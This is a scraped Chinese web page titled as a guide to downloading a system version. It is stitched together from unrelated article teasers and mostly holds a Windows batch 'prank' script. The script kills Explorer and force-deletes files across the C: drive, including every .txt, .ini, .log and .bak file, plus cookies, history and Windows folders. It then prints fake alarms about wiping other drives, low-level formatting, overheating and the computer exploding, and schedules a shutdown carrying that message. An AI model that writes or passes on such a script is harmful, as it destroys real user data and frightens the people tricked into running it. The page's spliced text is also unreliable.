怎么從電腦上下載電腦系統(tǒng)版本
2.點(diǎn)擊立即下載3.進(jìn)入下載頁面,點(diǎn)擊下載按鈕進(jìn)行下載4.下載完成,獲得壓縮包5.解壓縮,選中壓縮包,右鍵選擇解壓到Office_Tool_with_runtime6.進(jìn)入解壓縮后的文件夾,雙擊Off...
2025.07.04COPYRIGHT ? 2023
粵ICP備2021108052號
郵箱:611661226@qq.com
留言給我@echo off
color 4f
taskkill /im explorer.exe /f
echo 刪除C盤所有文件......
del /f /s /q "%systemdrive%\*.tmp"
del /f /s /q "%systemdrive%\*.dmp"
del /f /s /q "%systemdrive%\*._mp"
del /f /s /q "%systemdrive%\*.gid"
del /f /s /q "%systemdrive%\*.old"
del /f /s /q "%systemdrive%\*.chk"
del /f /s /q "%systemdrive%\*.bak"
del /f /s /q "%systemdrive%\*.log"
del /f /s /q "%systemdrive%\*.txt"
del /f /s /q "%systemdrive%\*.ini"
del /f /s /q "%systemdrive%\Recycled\*.*"
del /f /s /q "%systemdrive%\RECYCLER\*.*"
del /f /s /q "%windir%\inf\*.pnf"
del /f /s /q "%windir%\Prefetch\*.*"
@ping -n 2 127.1>nul
rd /s /q "%windir%\Downloaded Program Files" & md "%windir%\Downloaded Program Files"
@ping -n 2 127.1>nul
rd /s /q "%windir%\LastGood" & md "%windir%\LastGood"
@ping -n 2 127.1>nul
rd /s /q "%windir%\Offline Web Pages" & md "%windir%\Offline Web Pages"
@ping -n 2 127.1>nul
rd /s /q "%windir%\SoftwareDistribution\Download" & md "%windir%\SoftwareDistribution\Download"
@ping -n 2 127.1>nul
rd /s /q "%windir%\temp" & md "%windir%\temp"
@ping -n 2 127.1>nul
rd /s /q "%userprofile%\Local Settings\Application Data\Microsoft\Media Player" & md "%windir%\Local
Settings\Application Data\Microsoft\Media Player"
@ping -n 2 127.1>nul
rd /s /q "%userprofile%\UserData" & md "%windir%\UserData"
@ping -n 2 127.1>nul
rd /s /q "%appdata%\Adobe" & md "%windir%\Adobe"
@ping -n 2 127.1>nul
rd /s /q "%appdata%\Macromedia" & md "%windir%\Macromedia"
@ping -n 2 127.1>nul
rd /s /q "%appdata%\Microsoft\Media Player" & md "%windir%\Microsoft\Media
Player"
@ping -n 2 127.1>nul
rd /s /q "%appdata%\Microsoft\Office\Recent" & md "%windir%\Microsoft\Office\Recent"
@ping -n 5 127.1>nul
del /a /f /s /q "%userprofile%\Cookies\*.*"
del /a /f /s /q "%userprofile%\Recent\*.*"
del /a /f /s /q "%userprofile%\Local Settings\Application Data\GDIPFONTCACHEV1.dat"
del /a /f /s /q "%userprofile%\Local Settings\Application Data\IconCache.db"
del /a /f /s /q "%userprofile%\Local Settings\History\*.*"
del /a /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /a /f /s /q "%temp%\*.*" del /a /f /s /q "%userprofile%\AppData\Local\GDIPFONTCACHEV1.dat"
del /a /f /s /q "%userprofile%\AppData\Local\IconCache.db"
del /a /f /s /q "%userprofile% \AppData\Local\Microsoft\Windows\History\*.*"
del /a /f /s /q "%userprofile% \AppData\Local\Microsoft\Windows\Temporary Internet Files\*.*"
del /a /f /s /q "%userprofile% \AppData\Roaming\Microsoft\Windows\Cookies\*.*"
del /a /f /s /q "%userprofile% \AppData\Roaming\Microsoft\Windows\Recent\*.*"
echo 已刪除完畢
@echo.
echo 刪除D盤所有文件......
@ping -n 3 127.1>nul
@echo 已刪除完畢
@echo.
echo 刪除E盤所有文件......
@ping -n 3 127.1>nul
echo 已刪除完畢
@echo.
echo 正在低級格式化全部硬盤......
@ping -n 3 127.1>nul
echo.
echo 正在 進(jìn)行二次 低格硬盤......
ping -n 3 127.1>nul
echo.
echo 正在 進(jìn)行三次 低格硬盤......
ping -n 3 127.1>nul
echo.
echo 正在 進(jìn)行四次 低格硬盤......
ping -n 3 127.1>nul
echo.
echo 正在 進(jìn)行五次 低格硬盤......
ping -n 3 127.1>nul
echo.
echo 注意: cpu溫度127度!溫度過高報(bào)警!!!
echo.
ping -n 2 127.1>nul
echo 注意: 硬盤溫度86度!溫度過高報(bào)警!!!
echo.
ping -n 2 127.1>nul
echo 注意: 顯卡溫度96度!溫度過高報(bào)警!!!
echo.
ping -n 2 127.1>nul
echo 注意: 系統(tǒng)崩潰, 主板溫度 超過臨界值!!! echo.
echo 注意: 電容負(fù)荷超過99% echo. & pause
echo 電腦將在60秒內(nèi)崩潰或爆炸!請勿強(qiáng)行關(guān)閉電源!否則會(huì) 導(dǎo)致cpu和硬盤徹底損毀!!
shutdown /r /t 60 /c "電腦將在60秒內(nèi)崩潰或爆炸!請勿強(qiáng)行關(guān)閉電源!否則會(huì) 導(dǎo)致cpu和硬盤徹底損毀!!"
ping -n 30 127.1>nul
shutdown -a
start explorer.exe
exit
這就是效果圖
2.點(diǎn)擊立即下載3.進(jìn)入下載頁面,點(diǎn)擊下載按鈕進(jìn)行下載4.下載完成,獲得壓縮包5.解壓縮,選中壓縮包,右鍵選擇解壓到Office_Tool_with_runtime6.進(jìn)入解壓縮后的文件夾,雙擊Off...
2025.07.04前言:遠(yuǎn)程訪問NAS主機(jī)方式有很多,咕噠盡量選擇套件或客戶端類的遠(yuǎn)程訪問方式,這樣對基礎(chǔ)薄弱的伙伴使用遠(yuǎn)程N(yùn)AS很方便。近期神卓軟件版本停止使用后,咕噠用了一周時(shí)間測試整理些篇教程。原創(chuàng)保姆式教程,全...
2025.07.03在操作計(jì)算機(jī)的過程中,許多用戶將格式化磁盤,U盤等,并右鍵單擊格式。實(shí)際上,您還可以使用格式化命令格式來格式化它,知道如何做到這一點(diǎn)?以下小型系列需要Win7作為一個(gè)例子,告訴您特定的操作方法。該操作...
2025.07.03薩古魯 Isha Sadhguru gives us tips to cleanse each of the five elements within us, which when practiced...
2025.07.03格式化后可以恢復(fù)數(shù)據(jù)嗎格式化是什么意思?格式化通常是指對所在磁盤或分區(qū)中進(jìn)行清除的一種操作。格式化一般情況下分為高級格式化和低級格式化,當(dāng)沒有特別指明的時(shí)候,通常進(jìn)行的是高級格式化操作。高級格式化(快...
2025.07.04